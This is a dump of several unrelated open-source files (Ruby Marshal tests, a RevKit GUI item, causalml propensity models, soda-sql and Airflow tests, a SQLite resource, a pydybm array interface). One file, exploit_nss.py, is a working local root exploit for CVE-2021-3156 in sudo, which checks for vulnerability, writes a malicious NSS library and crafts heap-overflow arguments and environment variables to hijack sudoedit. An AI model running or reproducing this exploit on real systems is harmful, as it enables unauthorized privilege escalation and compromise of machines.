assert self.unwrap(space, w_res) == ["foo", "bar"]
def test_incompatible_format(self, space):
with self.raises(
space,
"TypeError",
"incompatible marshal file format (can't be read)\n"
"format version 4.8 required; 97.115 given"
):
space.execute("Marshal.load('asd')")
def test_short_data(self, space):
with self.raises(space, "ArgumentError", "marshal data too short"):
space.execute("Marshal.load('')")
def test_parameters(self, space):
with self.raises(space, "TypeError", "instance of IO needed"):
space.execute("Marshal.load(4)")
def test_io(self, space, tmpdir):
f = tmpdir.join("testfile")
w_res = space.execute("""
Marshal.dump('hallo', File.new('%s', 'wb'))
file = File.open('%s', 'rb')
return Marshal.load(file.read)
""" % (f, f))
assert space.str_w(w_res) == "hallo"
w_res = space.execute("""
Marshal.dump('hallo', File.new('%s', 'wb'))
file = File.open('%s', 'rb')
return Marshal.load(file)
""" % (f, f))
assert space.str_w(w_res) == "hallo"
|
rkqc/tools/gui/items/ESOPSynthesisItem.py | clairechingching/ScaffCC | 158 | 11089877 | <gh_stars>100-1000
# RevKit: A Toolkit for Reversible Circuit Design (www.revkit.org)
# Copyright (C) 2009-2011 The RevKit Developers <<EMAIL>>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt4.QtCore import QSize, pyqtProperty
from revkit import circuit, esop_synthesis, weighted_reordering
from core.BaseItem import *
from helpers.RevKitHelper import *
from ui.DesignerWidget import DesignerWidget
from ui.ESOPSynthesis import Ui_ESOPSynthesis
class ESOPSynthesis( DesignerWidget ):
def __init__( self, parent = None ):
DesignerWidget.__init__( self, Ui_ESOPSynthesis, parent )
@item( "ESOP Synthesis",
requires = "PLA", provides = "Circuit",
properties = [ "separate_polarities", "reordering", "alpha", "beta", "garbage_name" ],
widget = { 'class': ESOPSynthesis, 'size': (350, 200) } )
class ESOPSynthesisItem( BaseItem ):
"""This item provides the ESOP-based synthesis method. After the item has been processed, the enlarged item reports the run-time needed to perform the synthesis."""
def onCreate( self ):
self.setText( "ESOP Synthesis" )
self.setState( self.CONFIGURED )
def executeEvent( self, inputs ):
circ = circuit()
res = esop_synthesis( circ, inputs[0],
separate_polarities = bool( int( self.separate_polarities ) ),
reordering = weighted_reordering( float( self.alpha ), float( self.beta ) ),
garbage_name = str( self.garbage_name ) )
if type( res ) == dict:
circuit_set_name( circ, inputs[0] )
self.widget.runtime.setText( "%.2f s" % res['runtime'] )
circuit_add_runtime( circ, res['runtime'] )
else:
return res
return [ circ ]
|
causalml/propensity.py | rainfireliang/causalml | 2919 | 11089922 | from abc import ABCMeta, abstractmethod
import logging
import numpy as np
from pygam import LogisticGAM, s
from sklearn.metrics import roc_auc_score as auc
from sklearn.linear_model import LogisticRegressionCV
from sklearn.model_selection import StratifiedKFold, train_test_split
import xgboost as xgb
logger = logging.getLogger('causalml')
class PropensityModel(metaclass=ABCMeta):
def __init__(self, clip_bounds=(1e-3, 1 - 1e-3), **model_kwargs):
"""
Args:
clip_bounds (tuple): lower and upper bounds for clipping propensity scores. Bounds should be implemented
such that: 0 < lower < upper < 1, to avoid division by zero in BaseRLearner.fit_predict() step.
model_kwargs: Keyword arguments to be passed to the underlying classification model.
"""
self.clip_bounds = clip_bounds
self.model_kwargs = model_kwargs
self.model = self._model
@property
@abstractmethod
def _model(self):
pass
def __repr__(self):
return self.model.__repr__()
def fit(self, X, y):
"""
Fit a propensity model.
Args:
X (numpy.ndarray): a feature matrix
y (numpy.ndarray): a binary target vector
"""
self.model.fit(X, y)
def predict(self, X):
"""
Predict propensity scores.
Args:
X (numpy.ndarray): a feature matrix
Returns:
(numpy.ndarray): Propensity scores between 0 and 1.
"""
return np.clip(
self.model.predict_proba(X)[:, 1], *self.clip_bounds
)
def fit_predict(self, X, y):
"""
Fit a propensity model and predict propensity scores.
Args:
X (numpy.ndarray): a feature matrix
y (numpy.ndarray): a binary target vector
Returns:
(numpy.ndarray): Propensity scores between 0 and 1.
"""
self.fit(X, y)
propensity_scores = self.predict(X)
logger.info('AUC score: {:.6f}'.format(auc(y, propensity_scores)))
return propensity_scores
class LogisticRegressionPropensityModel(PropensityModel):
"""
Propensity regression model based on the LogisticRegression algorithm.
"""
@property
def _model(self):
kwargs = {
'penalty': 'elasticnet',
'solver': 'saga',
'Cs': np.logspace(1e-3, 1 - 1e-3, 4),
'l1_ratios': np.linspace(1e-3, 1 - 1e-3, 4),
'cv': StratifiedKFold(
n_splits=self.model_kwargs.pop('n_fold') if 'n_fold' in self.model_kwargs else 4,
shuffle=True,
random_state=self.model_kwargs.get('random_state', 42)
),
'random_state': 42,
}
kwargs.update(self.model_kwargs)
return LogisticRegressionCV(**kwargs)
class ElasticNetPropensityModel(LogisticRegressionPropensityModel):
pass
class GradientBoostedPropensityModel(PropensityModel):
"""
Gradient boosted propensity score model with optional early stopping.
Notes
-----
Please see the xgboost documentation for more information on gradient boosting tuning parameters:
https://xgboost.readthedocs.io/en/latest/python/python_api.html
"""
def __init__(
self,
early_stop=False,
clip_bounds=(1e-3, 1 - 1e-3),
**model_kwargs
):
super(GradientBoostedPropensityModel, self).__init__(clip_bounds, **model_kwargs)
self.early_stop = early_stop
@property
def _model(self):
kwargs = {
'max_depth': 8,
'learning_rate': 0.1,
'n_estimators': 100,
'objective': 'binary:logistic',
'nthread': -1,
'colsample_bytree': 0.8,
'random_state': 42,
}
kwargs.update(self.model_kwargs)
return xgb.XGBClassifier(**kwargs)
def fit(self, X, y, early_stopping_rounds=10, stop_val_size=0.2):
"""
Fit a propensity model.
Args:
X (numpy.ndarray): a feature matrix
y (numpy.ndarray): a binary target vector
"""
if self.early_stop:
X_train, X_val, y_train, y_val = train_test_split(
X, y, test_size=stop_val_size
)
self.model.fit(
X_train,
y_train,
eval_set=[(X_val, y_val)],
early_stopping_rounds=early_stopping_rounds
)
else:
super(GradientBoostedPropensityModel, self).fit(X, y)
def predict(self, X):
"""
Predict propensity scores.
Args:
X (numpy.ndarray): a feature matrix
Returns:
(numpy.ndarray): Propensity scores between 0 and 1.
"""
if self.early_stop:
return np.clip(
self.model.predict_proba(
X,
ntree_limit=self.model.best_ntree_limit
)[:, 1],
*self.clip_bounds
)
else:
return super(GradientBoostedPropensityModel, self).predict(X)
def calibrate(ps, treatment):
"""Calibrate propensity scores with logistic GAM.
Ref: https://pygam.readthedocs.io/en/latest/api/logisticgam.html
Args:
ps (numpy.array): a propensity score vector
treatment (numpy.array): a binary treatment vector (0: control, 1: treated)
Returns:
(numpy.array): a calibrated propensity score vector
"""
gam = LogisticGAM(s(0)).fit(ps, treatment)
return gam.predict_proba(ps)
def compute_propensity_score(X, treatment, p_model=None, X_pred=None, treatment_pred=None, calibrate_p=True):
"""Generate propensity score if user didn't provide
Args:
X (np.matrix): features for training
treatment (np.array or pd.Series): a treatment vector for training
p_model (propensity model object, optional):
ElasticNetPropensityModel (default) / GradientBoostedPropensityModel
X_pred (np.matrix, optional): features for prediction
treatment_pred (np.array or pd.Series, optional): a treatment vector for prediction
calibrate_p (bool, optional): whether calibrate the propensity score
Returns:
(tuple)
- p (numpy.ndarray): propensity score
- p_model (PropensityModel): a trained PropensityModel object
"""
if treatment_pred is None:
treatment_pred = treatment.copy()
if p_model is None:
p_model = ElasticNetPropensityModel()
p_model.fit(X, treatment)
if X_pred is None:
p = p_model.predict(X)
else:
p = p_model.predict(X_pred)
if calibrate_p:
logger.info('Calibrating propensity scores.')
p = calibrate(p, treatment_pred)
# force the p values within the range
eps = np.finfo(float).eps
p = np.where(p < 0 + eps, 0 + eps*1.001, p)
p = np.where(p > 1 - eps, 1 - eps*1.001, p)
return p, p_model
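# Hedged usage sketch (added illustration, not part of the original module). The names
# X (feature matrix) and treatment (binary vector) are assumed, matching the docstring above:
#
#     from causalml.propensity import compute_propensity_score
#     p, p_model = compute_propensity_score(X, treatment, calibrate_p=True)
#     # p: calibrated propensity scores forced to stay strictly inside (0, 1)
#     # p_model: the fitted ElasticNetPropensityModel that produced them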
|
tests/local/warehouse/metrics/test_filter_and_group_by.py | pgoslatara/soda-sql | 787 | 11089934 | <reponame>pgoslatara/soda-sql<gh_stars>100-1000
# Copyright 2020 Soda
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from sodasql.scan.scan_yml_parser import KEY_COLUMNS
from tests.common.sql_test_case import SqlTestCase
class FilterAndGroupByTest(SqlTestCase):
"""
Due to the use of multiple inheritance, setUp() methods for all inherited classes will be called, thus,
one should not put anything in setUp() that can affect other test methods, such as creating tables.
"""
def test_row_count_with_filter_and_group_by(self):
self._create_test_table()
metric = {
'type': 'row_count',
'filter': {
'type': 'and',
'andExpressions': [{
'type': 'not',
'expression': {
'type': 'equals',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 'one'
}
}
},
{
'type': 'lessThan',
'left': {
'type': 'columnValue',
'columnName': 'size'
},
'right': {
'type': 'number',
'value': 6
}
}
]
},
'groupBy': ['name']
}
rows = self.execute_metric(self.warehouse, metric)
logging.debug(str(rows))
count_by_name = {row[0]: row[1] for row in rows}
self.assertEqual(count_by_name['two'], 4)
self.assertEqual(count_by_name['three'], 5)
self.assertEqual(count_by_name['four'], 2)
def test_sum_with_filter_and_group_by(self):
self._create_test_table()
metric = {
'type': 'sum',
'columnName': 'size',
'filter': {
'type': 'contains',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 't'
}
},
'groupBy': ['name']
}
rows = self.execute_metric(self.warehouse, metric)
logging.debug(str(rows))
sum_by_name = {row[0]: row[1] for row in rows}
self.assertEqual(sum_by_name['two'], 10)
self.assertEqual(sum_by_name['three'], 28)
def test_sum_with_filter_and_group_by_and_custom_missing(self):
self._create_test_table()
metric = {
'type': 'sum',
'columnName': 'size',
'filter': {
'type': 'lessThan',
'left': {
'type': 'columnValue',
'columnName': 'size'
},
'right': {
'type': 'number',
'value': 4
}
},
'groupBy': ['name']
}
rows = self.execute_metric(self.warehouse, metric, {
KEY_COLUMNS: {
'size': {
'missing_values': [1, 100]
}
}
})
logging.debug(str(rows))
sum_by_name = {row[0]: row[1] for row in rows}
self.assertEqual(sum_by_name['two'], 5)
self.assertEqual(sum_by_name['three'], 5)
self.assertEqual(sum_by_name['four'], 2)
self.assertIsNone(sum_by_name.get('one'))
def test_contains_expression(self):
self._create_test_table()
where_expr = self.warehouse.dialect.sql_expression({
'type': 'contains',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 'ou'
}
})
rows = self.warehouse.sql_fetchall(
f'SELECT * \n'
f'FROM {self.default_test_table_name} \n'
f'WHERE {where_expr}')
self.assertEqual(len(rows), 2)
for row in rows:
self.assertEqual(row[0], 'four')
where_expr = self.warehouse.dialect.sql_expression({
'type': 'startsWith',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 'thr'
}
})
rows = self.warehouse.sql_fetchall(
f'SELECT * \n'
f'FROM {self.default_test_table_name} \n'
f'WHERE {where_expr}')
self.assertEqual(len(rows), 7)
for row in rows:
self.assertEqual(row[0], 'three')
where_expr = self.warehouse.dialect.sql_expression({
'type': 'endsWith',
'left': {
'type': 'columnValue',
'columnName': 'name'
},
'right': {
'type': 'string',
'value': 'ee'
}
})
rows = self.warehouse.sql_fetchall(
f'SELECT * \n'
f'FROM {self.default_test_table_name} \n'
f'WHERE {where_expr}')
self.assertEqual(len(rows), 7)
for row in rows:
self.assertEqual(row[0], 'three')
def _create_test_table(self):
self.sql_recreate_table(
[f"name {self.dialect.data_type_varchar_255}",
f"size {self.dialect.data_type_integer}"],
["('one', 1)",
"('two', 1)",
"('two', 2)",
"('two', 3)",
"('two', 4)",
"('three', 1)",
"('three', 2)",
"('three', 3)",
"('three', 4)",
"('three', 5)",
"('three', 6)",
"('three', 7)",
"('four', 1)",
"('four', 2)",
"(null, 1)"])
|
exploit_nss.py | marcostolosa/CVE-2021-3156 | 473 | 11089939 | #!/usr/bin/python3
'''
Exploit for CVE-2021-3156 that overwrites struct service_user, by sleepya
This exploit requires:
- glibc with tcache
- nscd service is not running
Tested on:
- Ubuntu 18.04
- Ubuntu 20.04
- Debian 10
- CentOS 8
'''
import os
import subprocess
import sys
from ctypes import cdll, c_char_p, POINTER, c_int, c_void_p
SUDO_PATH = b"/usr/bin/sudo"
libc = cdll.LoadLibrary("libc.so.6")
# don't use LC_ALL (6). it overrides the other LC_* categories
LC_CATS = [
b"LC_CTYPE", b"LC_NUMERIC", b"LC_TIME", b"LC_COLLATE", b"LC_MONETARY",
b"LC_MESSAGES", b"LC_ALL", b"LC_PAPER", b"LC_NAME", b"LC_ADDRESS",
b"LC_TELEPHONE", b"LC_MEASUREMENT", b"LC_IDENTIFICATION"
]
def check_is_vuln():
# the commands below produce no log because the arguments are invalid for both patched and unpatched versions
# patched version, error because of '-s' argument
# unpatched version, error because of '-A' argument but no SUDO_ASKPASS environment
r, w = os.pipe()
pid = os.fork()
if not pid:
# child
os.dup2(w, 2)
execve(SUDO_PATH, [ b"sudoedit", b"-s", b"-A", b"/aa", None ], [ None ])
exit(0)
# parent
os.close(w)
os.waitpid(pid, 0)
r = os.fdopen(r, 'r')
err = r.read()
r.close()
if "sudoedit: no askpass program specified, try setting SUDO_ASKPASS" in err:
return True
assert err.startswith('usage: ') or "invalid mode flags " in err, err
return False
def create_libx(name):
so_path = 'libnss_'+name+'.so.2'
if os.path.isfile(so_path):
return # existed
so_dir = 'libnss_' + name.split('/')[0]
if not os.path.exists(so_dir):
os.makedirs(so_dir)
import zlib
import base64
libx_b64 = '<KEY>'
with open(so_path, 'wb') as f:
f.write(zlib.decompress(base64.b64decode(libx_b64)))
#os.chmod(so_path, 0o755)
def check_nscd_condition():
if not os.path.exists('/var/run/nscd/socket'):
return True # no socket. no service
# try connect
import socket
sk = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sk.connect('/var/run/nscd/socket')
except:
return True
else:
sk.close()
with open('/etc/nscd.conf', 'r') as f:
for line in f:
line = line.strip()
if not line.startswith('enable-cache'):
continue # comment
service, enable = line.split()[1:]
# in fact, if only passwd is enabled, exploiting with this method is still possible (needs testing)
# I think no one enables passwd but disables group
if service == 'passwd' and enable == 'yes':
return False
# group MUST be disabled to exploit sudo with nss_load_library() trick
if service == 'group' and enable == 'yes':
return False
return True
def get_libc_version():
output = subprocess.check_output(['ldd', '--version'], universal_newlines=True)
for line in output.split('\n'):
if line.startswith('ldd '):
ver_txt = line.rsplit(' ', 1)[1]
return list(map(int, ver_txt.split('.')))
return None
def check_libc_version():
version = get_libc_version()
assert version, "Cannot detect libc version"
# this exploit only works with glibc tcache (added in 2.26)
return version[0] >= 2 and version[1] >= 26
def check_libc_tcache():
libc.malloc.argtypes = (c_int,)
libc.malloc.restype = c_void_p
libc.free.argtypes = (c_void_p,)
# small bin or tcache
size1, size2 = 0xd0, 0xc0
mems = [0]*32
# consume all size2 chunks
for i in range(len(mems)):
mems[i] = libc.malloc(size2)
mem1 = libc.malloc(size1)
libc.free(mem1)
mem2 = libc.malloc(size2)
libc.free(mem2)
for addr in mems:
libc.free(addr)
return mem1 != mem2
def get_service_user_idx():
'''Parse /etc/nsswitch.conf to find a group entry index
'''
idx = 0
found = False
with open('/etc/nsswitch.conf', 'r') as f:
for line in f:
if line.startswith('#'):
continue # comment
line = line.strip()
if not line:
continue # empty line
words = line.split()
if words[0] == 'group:':
found = True
break
for word in words[1:]:
if word[0] != '[':
idx += 1
assert found, '"group" database is not found. might be exploitable but no test'
return idx
def get_extra_chunk_count(target_chunk_size):
# service_user structs are allocated by calling getpwuid()
# so we don't care about allocations of chunk size 0x40 after getpwuid()
# there are many strings whose size can vary
# here is the most common
chunk_cnt = 0
# get_user_info() -> get_user_groups() ->
gids = os.getgroups()
malloc_size = len("groups=") + len(gids) * 11
chunk_size = (malloc_size + 8 + 15) & 0xfffffff0 # minimum size is 0x20. don't care here
if chunk_size == target_chunk_size: chunk_cnt += 1
# host=<hostname> (unlikely)
# get_user_info() -> sudo_gethostname()
import socket
malloc_size = len("host=") + len(socket.gethostname()) + 1
chunk_size = (malloc_size + 8 + 15) & 0xfffffff0
if chunk_size == target_chunk_size: chunk_cnt += 1
# simply parse "networks=" from "ip addr" command output
# another workaround is bruteforcing with number of 0x70
# policy_open() -> format_plugin_settings() ->
# a value is created from "parse_args() -> get_net_ifs()" with very large buffer
try:
import ipaddress
except:
return chunk_cnt
cnt = 0
malloc_size = 0
proc = subprocess.Popen(['ip', 'addr'], stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)
for line in proc.stdout:
line = line.strip()
if not line.startswith('inet'):
continue
if cnt < 2: # skip first 2 address (lo interface)
cnt += 1
continue;
addr = line.split(' ', 2)[1]
mask = str(ipaddress.ip_network(addr if sys.version_info >= (3,0,0) else addr.decode("UTF-8"), False).netmask)
malloc_size += addr.index('/') + 1 + len(mask)
cnt += 1
malloc_size += len("network_addrs=") + cnt - 3 + 1
chunk_size = (malloc_size + 8 + 15) & 0xfffffff0
if chunk_size == target_chunk_size: chunk_cnt += 1
proc.wait()
return chunk_cnt
def execve(filename, argv, envp):
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(envp))(*envp)
libc.execve(filename, cargv, cenvp)
def lc_env(cat_id, chunk_len):
name = b"C.UTF-8@"
name = name.ljust(chunk_len - 0x18, b'Z')
return LC_CATS[cat_id]+b"="+name
assert check_is_vuln(), "target is patched"
assert check_libc_version(), "glibc is too old. The exploit relies on the glibc tcache feature. Need version >= 2.26"
assert check_libc_tcache(), "glibc tcache is not found"
assert check_nscd_condition(), "nscd service is running, exploit is impossible with this method"
service_user_idx = get_service_user_idx()
assert service_user_idx < 9, '"group" db in nsswitch.conf is too far, idx: %d' % service_user_idx
create_libx("X/X1234")
# Note: actions[5] can be any value. library and known MUST be NULL
FAKE_USER_SERVICE_PART = [ b"\\" ] * 0x18 + [ b"X/X1234\\" ]
TARGET_OFFSET_START = 0x780
FAKE_USER_SERVICE = FAKE_USER_SERVICE_PART*30
FAKE_USER_SERVICE[-1] = FAKE_USER_SERVICE[-1][:-1] # remove last '\\'. stop overwritten
CHUNK_CMND_SIZE = 0xf0
# Allow a custom extra_chunk_cnt in case of unexpected allocations
# Note: this step should not be needed when CHUNK_CMND_SIZE is 0xf0
extra_chunk_cnt = get_extra_chunk_count(CHUNK_CMND_SIZE) if len(sys.argv) < 2 else int(sys.argv[1])
argv = [ b"sudoedit", b"-A", b"-s", b"A"*(CHUNK_CMND_SIZE-0x10)+b"\\", None ]
env = [ b"Z"*(TARGET_OFFSET_START + 0xf - 8 - 1) + b"\\" ] + FAKE_USER_SERVICE
# first 2 chunks are fixed. chunk40 (target service_user) is overwritten from overflown cmnd (in get_cmnd)
env.extend([ lc_env(0, 0x40)+b";A=", lc_env(1, CHUNK_CMND_SIZE) ])
# add free chunks that created before target service_user
for i in range(2, service_user_idx+2):
# skip LC_ALL (6)
env.append(lc_env(i if i < 6 else i+1, 0x40))
if service_user_idx == 0:
env.append(lc_env(2, 0x20)) # for filling hole
for i in range(11, 11-extra_chunk_cnt, -1):
env.append(lc_env(i, CHUNK_CMND_SIZE))
env.append(lc_env(12, 0x90)) # for filling holes from freed file buffer
env.append(b"TZ=:") # shortcut tzset function
# don't set the "SUDO_ASKPASS" environment variable. sudo will fail without logging if there is no segfault
env.append(None)
execve(SUDO_PATH, argv, env)
|
chapter09/tests/airflowbook/operators/test_movielens_operator.py | add54/Data_PipeLine_Apache_Airflow | 303 | 11089951 | <filename>chapter09/tests/airflowbook/operators/test_movielens_operator.py
import datetime
import os
from collections import namedtuple
from pathlib import Path
import pytest
from airflow.models import DAG, Connection
from pytest_docker_tools import fetch, container
from pytest_mock import MockFixture
from airflowbook.operators.movielens_operator import (
MovielensDownloadOperator,
MovielensHook,
MovielensToPostgresOperator,
PostgresHook,
)
@pytest.fixture(scope="module")
def postgres_credentials():
PostgresCredentials = namedtuple("PostgresCredentials", ["username", "password"])
return PostgresCredentials("testuser", "testpass")
postgres_image = fetch(repository="postgres:11.1-alpine")
postgres = container(
image="{postgres_image.id}",
environment={
"POSTGRES_USER": "{postgres_credentials.username}",
"POSTGRES_PASSWORD": "{postgres_credentials.password}",
},
ports={"5432/tcp": None},
volumes={
os.path.join(os.path.dirname(__file__), "postgres-init.sql"): {
"bind": "/docker-entrypoint-initdb.d/postgres-init.sql"
}
},
)
def test_movielens_operator(tmp_path: Path, mocker: MockFixture):
mocker.patch.object(
MovielensHook,
"get_connection",
return_value=Connection(conn_id="test", login="airflow", password="<PASSWORD>"),
)
dag = DAG(
"test_dag",
default_args={"owner": "airflow", "start_date": datetime.datetime(2019, 1, 1)},
schedule_interval="@daily",
)
task = MovielensDownloadOperator(
task_id="test",
conn_id="testconn",
start_date="{{ prev_ds }}",
end_date="{{ ds }}",
output_path=str(tmp_path / "{{ ds }}.json"),
dag=dag,
)
dag.clear()
task.run(
start_date=dag.default_args["start_date"],
end_date=dag.default_args["start_date"],
ignore_ti_state=True,
)
def test_movielens_to_postgres_operator(
mocker: MockFixture, test_dag: DAG, postgres, postgres_credentials
):
mocker.patch.object(
MovielensHook,
"get_connection",
return_value=Connection(conn_id="test", login="airflow", password="<PASSWORD>"),
)
mocker.patch.object(
PostgresHook,
"get_connection",
return_value=Connection(
conn_id="postgres",
conn_type="postgres",
host="localhost",
login=postgres_credentials.username,
password=postgres_credentials.password,
port=postgres.ports["5432/tcp"][0],
),
)
task = MovielensToPostgresOperator(
task_id="test",
movielens_conn_id="movielens_id",
start_date="{{ prev_ds }}",
end_date="{{ ds }}",
postgres_conn_id="postgres_id",
insert_query=(
"INSERT INTO movielens (movieId,rating,ratingTimestamp,userId,scrapeTime) "
"VALUES ({0}, '{{ macros.datetime.now() }}')"
),
dag=test_dag,
)
pg_hook = PostgresHook()
row_count = pg_hook.get_first("SELECT COUNT(*) FROM movielens")[0]
assert row_count == 0
pytest.helpers.run_airflow_task(task, test_dag)
row_count = pg_hook.get_first("SELECT COUNT(*) FROM movielens")[0]
assert row_count > 0
postgres_container = container(image="{postgres_image.id}", ports={"5432/tcp": None})
def test_call_fixture(postgres_container):
print(
f"Running Postgres container named {postgres_container.name} "
f"on port {postgres_container.ports['5432/tcp'][0]}."
)
|
local_data_api/resources/sqlite.py | roganov/local-data-api | 102 | 11089961 | from __future__ import annotations
import sqlite3
from typing import TYPE_CHECKING, Any, Dict, List, Optional
from sqlalchemy.dialects import sqlite
from local_data_api.models import ColumnMetadata, Field
from local_data_api.resources.resource import Resource, register_resource_type
if TYPE_CHECKING: # pragma: no cover
from local_data_api.resources.resource import ConnectionMaker, Cursor
@register_resource_type
class SQLite(Resource):
def autocommit_off(self) -> None:
# default is off
pass
def create_column_metadata_set(self, cursor: Cursor) -> List[ColumnMetadata]:
raise NotImplementedError
DIALECT = sqlite.dialect(paramstyle='named')
@classmethod
def create_connection_maker(
cls,
host: Optional[str] = None,
port: Optional[int] = None,
user_name: Optional[str] = None,
password: Optional[str] = None,
engine_kwargs: Dict[str, Any] = None,
) -> ConnectionMaker:
def connect(_: Optional[str] = None): # type: ignore
return sqlite3.connect(':memory:')
return connect
def get_field_from_value(self, value: Any) -> Field:
return super().get_field_from_value(value)
|
dev/Gems/CloudGemMessageOfTheDay/AWS/lambda-code/ServiceLambda/message_utils.py | jeikabu/lumberyard | 1738 | 11089984 | <filename>dev/Gems/CloudGemMessageOfTheDay/AWS/lambda-code/ServiceLambda/message_utils.py
import importlib
import boto3
import CloudCanvas
import errors
from cgf_utils import custom_resource_utils
from datetime import datetime
# Had to use these custom min and max rather than datetime.min because datetime.strttime will not accept a date prior to 1900
custom_datetime_min = 'Jan 1 1900 00:00'
custom_datetime_min_as_number = 190001010000
custom_datetime_max = 'Dec 31 2100 23:59'
custom_datetime_max_as_number = 210012312359
message_size_limit = 700
def get_message_table():
    if not hasattr(get_message_table, 'message_table'):
        message_table_name = custom_resource_utils.get_embedded_physical_id(CloudCanvas.get_setting('MessageTable'))
        message_table = boto3.resource(
            'dynamodb').Table(message_table_name)
        if message_table is None:
            raise RuntimeError('No Message Table')
        # cache the table resource on the function so repeated calls reuse the same object
        get_message_table.message_table = message_table
    return get_message_table.message_table
#time utility functions
def _get_time_format():
return '%b %d %Y %H:%M'
def get_struct_time(timestring):
try:
return datetime.strptime(timestring, _get_time_format())
except ValueError:
raise errors.ClientError('Expected time format {}'.format(get_formatted_time_string(datetime.utcnow())))
def get_formatted_time(timeval):
return datetime.strftime(timeval, '%b %d %Y %H:%M')
def get_time_as_number(timestring):
if timestring is None:
timeStruct = datetime.utcnow()
return int(datetime.strftime(timeStruct, '%Y%m%d%H%M'))
timeStruct = get_struct_time(timestring)
return int(datetime.strftime(timeStruct, '%Y%m%d%H%M'))
def get_struct_time_as_number(timestruct):
return int(datetime.strftime(timestruct, '%Y%m%d%H%M'))
def get_formatted_time_from_number(timenum):
year = int(timenum/100000000)
remain = int(timenum - year*100000000)
month = int(remain/1000000)
remain -= month*1000000
day = int(remain/10000)
remain -= day*10000
hour = int(remain/100)
minute = remain - hour*100
d = datetime(year, month, day, hour, minute)
return get_formatted_time(d)
def validate_start_end_times(start_timeval, end_timeval):
#Scheduling with start and end time
if get_struct_time(end_timeval) <= get_struct_time(start_timeval):
raise errors.ClientError('Invalid: End time ' + end_timeval + ' <= Start time ' + start_timeval)
#Scheduling with no end time is always valid
return True
|
src/pydybm/arraymath/__init__.py | ibm-research-tokyo/dybm | 126 | 11089998 | <filename>src/pydybm/arraymath/__init__.py
# (C) Copyright IBM Corp. 2016
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Interface of array modules.
pydybm modules use multi-dimensional arrays via this interface.
Two implementations for this interface are given: numpy and cupy.
Users can enable DyBMs based on either by importing ``arraymath.dynumpy`` or
``arraymath.dycupy`` modules and giving it to ``setup`` function.
"""
__author__ = "<NAME>"
from . import dynumpy
def setup(lib):
''' Enable an array module globally.
Parameters
----------
lib: arraymath.dynumpy or arraymath.dycupy
'''
global to_numpy, array, empty, zeros, ones, arange, eye
to_numpy = lib.to_numpy
array = lib.array
empty = lib.empty
zeros = lib.zeros
ones = lib.ones
arange = lib.arange
eye = lib.eye
''' Attributes '''
global ndim
ndim = lib.ndim
''' Mathematical operations on arrays or numbers '''
global log, exp, sqrt, abs, sign, sin, tanh, floor
log = lib.log
exp = lib.exp
sqrt = lib.sqrt
abs = lib.abs
sign = lib.sign
sin = lib.sin
tanh = lib.tanh
floor = lib.floor
''' Reduction operations on arrays '''
global sum, max, mean, median, var, prod, cond, argmax, asarray
global root_mean_square_err
sum = lib.sum
max = lib.max
mean = lib.mean
median = lib.median
var = lib.var
prod = lib.prod
cond = lib.cond
argmax = lib.argmax
asarray = lib.asarray
root_mean_square_err = lib.root_mean_square_err
''' Matrix operations '''
global dot, transpose, tensordot, multiply
dot = lib.dot
transpose = lib.transpose
tensordot = lib.tensordot
multiply = lib.multiply
global maximum, minimum, concatenate
maximum = lib.maximum
minimum = lib.minimum
concatenate = lib.concatenate
global diag, roll, allclose, outer, inner
diag = lib.diag
roll = lib.roll
allclose = lib.allclose
outer = lib.outer
inner = lib.inner
''' Constants '''
global inf, pi, identity, newaxis
inf = lib.inf
pi = lib.pi
identity = lib.identity
newaxis = lib.newaxis
''' Modules '''
global random
random = lib.random
''' scipy functions '''
global cho_factor, cho_solve, linalg_solve
global stats_multivariate_normal_logpdf
cho_factor = lib.cho_factor
cho_solve = lib.cho_solve
linalg_solve = lib.linalg_solve
stats_multivariate_normal_logpdf = lib.stats_multivariate_normal_logpdf
''' sklearn functions '''
global mean_squared_error, kernel_metrics, log_logistic
mean_squared_error = lib.mean_squared_error
kernel_metrics = lib.kernel_metrics
log_logistic = lib.log_logistic
''' advanced indexing '''
global assign_if_true
assign_if_true = lib.assign_if_true
''' Matrix operations '''
global op
op = lib.op
''' FIFO data structures '''
global FIFO
FIFO = lib.fifo.FIFO
''' DataQueue '''
global DataQueue
DataQueue = lib.DataQueue
setup(dynumpy)
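# Hedged usage sketch (added illustration, not part of the original module): switching the
# global backend to the cupy implementation, assuming ``pydybm.arraymath.dycupy`` is
# importable in your environment:
#
#     import pydybm.arraymath as amath
#     from pydybm.arraymath import dycupy
#     amath.setup(dycupy)  # subsequent amath.zeros / amath.dot calls now use cupy arrays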
|
test/utils/test_yaml.py | idoby/SimpleParsing | 150 | 11090001 | <reponame>idoby/SimpleParsing<gh_stars>100-1000
""" Tests for serialization to/from yaml files. """
from collections import OrderedDict
from dataclasses import dataclass, field, fields
from typing import Any, Dict, List, Optional, Tuple, Mapping, Type
from pathlib import Path
import pytest
import textwrap
from simple_parsing import mutable_field, list_field
